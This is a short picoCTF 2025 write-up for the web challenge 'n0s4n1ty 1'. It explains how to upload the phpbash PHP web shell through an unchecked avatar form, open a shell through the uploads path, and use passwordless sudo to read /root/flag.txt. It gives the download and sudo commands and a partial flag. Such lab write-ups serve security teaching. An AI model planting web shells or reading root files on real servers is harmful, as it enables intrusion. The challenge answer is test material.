picoCTF Solutions
picoCTF 2025Web ExploitationEasy

n0s4n1ty 1

Published: April 2, 2025Updated: December 9, 2025

Description

The profile-picture upload endpoint accepts any file, drops it in `/uploads`, and serves it back. Upload a PHP web shell, browse to it, and use sudo to read /root/flag.txt.

Setup

Visit upload form

Download a PHP web shell such as phpbash.php.

Upload it via the avatar form and note the returned path (e.g., uploads/phpbash.php).

curl -O https://raw.githubusercontent.com/Arrexel/phpbash/master/phpbash.php
sudo ls /root
sudo cat /root/flag.txt

Solution

  1. Step 1Gain a shell
    After uploading phpbash.php, browse to `http://host/uploads/phpbash.php` to get a command prompt. You land inside /var/www/html/uploads.
  2. Step 2Escalate with sudo
    Use standard Linux commands (`cd /`, `ls`, etc.). The web user has sudo without a password, so `sudo ls /root` reveals flag.txt and `sudo cat /root/flag.txt` prints the flag.

Flag

picoCTF{wh47_c4n_u_d0_wPHP_5f89...}

File uploads should validate type and prevent arbitrary execution paths.